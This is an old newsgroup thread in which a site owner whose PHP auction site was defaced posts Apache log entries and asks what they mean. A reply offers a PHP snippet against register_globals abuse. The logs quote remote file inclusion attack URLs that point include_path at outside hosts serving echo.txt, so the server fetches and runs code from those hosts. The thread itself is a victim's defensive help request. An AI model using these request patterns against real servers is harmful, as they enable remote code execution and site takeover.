|
Posted by Charles Crume on 10/17/07 23:22
Hi Jean;
This has to be added to every script, correct? (If so, it would be too much
work and I would be better off to purchase newer auction software.)
I am also looking at use mod_rewrite in Apache to redirect any request with
"include_path" in it to a null page. Does anyone have thoughts on this
approach?
TIA.
Charles...
"Jean Gaudreau" <jean.gaudreau@gmail.com> wrote in message
news:1192541328.007138.293000@i13g2000prf.googlegroups.com...
> On Oct 14, 9:56 pm, "Charles Crume"
> <NOccsS...@charlescrumesoftware.com> wrote:
>> Hello Everyone;
>>
>> My site was hacked the other day -- someone was able to rename my
>> index.shtml file and put their own index.html file on my server. Not sure
>> how it was done, but looking through the log file, I found a lots and
>> lots
>> of entries where an "include_path" parameter was included in the URL of
>> the
>> PHP page, as shown below:
>>
>> 69.94.36.155 - - [11/Oct/2007:15:07:23 -0400] "GET
>> /auction/item.php?id=268/includes/auctionstoshow.inc.php?include_path=http://www.usiauctions.biz/logo/pekok/doc/echo.txt?
>> HTTP/1.1" 200 56446 "-" "libwww-perl/5.65"
>>
>> 69.94.36.155 - - [11/Oct/2007:15:07:38 -0400] "GET
>> /auction/includes/settings.inc.php?include_path=http://www.usiauctions.biz/logo/pekok/doc/echo.txt?
>> HTTP/1.1" 200 75 "-" "libwww-perl/5.65"
>>
>> 69.94.36.155 - - [11/Oct/2007:15:07:39 -0400] "GET
>> /auction/includes/settings.inc.php?include_path=http://www.usiauctions.biz/logo/pekok/doc/echo.txt?
>> HTTP/1.0" 200 75 "-" "Mozilla/5.0"
>>
>> 213.194.149.61 - - [11/Oct/2007:15:45:39 -0400] "GET
>> /auction/index.php?include_path=http://www.baybids.com/uploaded/echo.txt?
>> HTTP/1.1" 200 78669 "-" "libwww-perl/5.808"
>>
>> 213.194.149.61 - - [11/Oct/2007:15:45:42 -0400] "GET
>> /index.php?include_path=http://www.baybids.com/uploaded/echo.txt?HTTP/1.1"
>> 404 310 "-" "libwww-perl/5.808"
>>
>> 213.194.149.61 - - [11/Oct/2007:15:46:49 -0400] "GET
>> /auction/index.php?include_path=http://www.baybids.com/uploaded/echo.txt?
>> HTTP/1.1" 200 78439 "-" "libwww-perl/5.808"
>>
>> 213.194.149.61 - - [11/Oct/2007:15:46:52 -0400] "GET
>> /index.php?include_path=http://www.baybids.com/uploaded/echo.txt?HTTP/1.1"
>> 404 310 "-" "libwww-perl/5.808"
>>
>> 213.194.149.61 - - [11/Oct/2007:15:48:11 -0400] "GET
>> /auction/item.php?id=268/includes/setting.inc.php?include_path=http://www.baybids.com/uploaded/echo.txt?
>> HTTP/1.1" 200 56360 "-" "libwww-perl/5.808"
>>
>> 213.194.149.61 - - [11/Oct/2007:15:48:13 -0400] "GET
>> /includes/setting.inc.php?include_path=http://www.baybids.com/uploaded/echo.txt?
>> HTTP/1.1" 404 325 "-" "libwww-perl/5.808"
>>
>> 213.194.149.61 - - [11/Oct/2007:15:48:13 -0400] "GET
>> /auction/includes/setting.inc.php?include_path=http://www.baybids.com/uploaded/echo.txt?
>> HTTP/1.1" 404 333 "-" "libwww-perl/5.808"
>>
>> I know how "include_path" works when *in* the PHP file, but I'm not sure
>> what the effect of including it in the URL. A number of entries show a
>> code
>> 404 as the culprits are obviously phising for pages, but requests with
>> return code 200 are showing a large number of bytes transferred -- far
>> larger than the PHP page itself.
>>
>> Can someone explain what adding "include_path" to a URL does?
>>
>> Is there something I need to check on my server of how I've got Apache
>> configured?
>>
>> TIA.
>>
>> Charles...
>
> Hi,
>
> I've been the target also of a hacker, with the same attack.
>
> Add this to you script:
>
> =====
>
> $php_self = $_SERVER['PHP_SELF'];
>
> if (($php_self == "/auction/includes/settings.inc.php") &&
> (ini_get(register_globals))) {
> $rg = array_keys($_REQUEST);
> foreach($rg as $var)
> {
> if ($_REQUEST[$var] === $$var)
> {
> unset($$var);
> exit;
> }
> }
> }
>
> =======
>
> This will check if they are running the file, if register_globals is
> enabled catch the parameters and unset them then halt the script.
>
> So far it is working.
>
> Jean
>
Navigation:
[Reply to this message]
|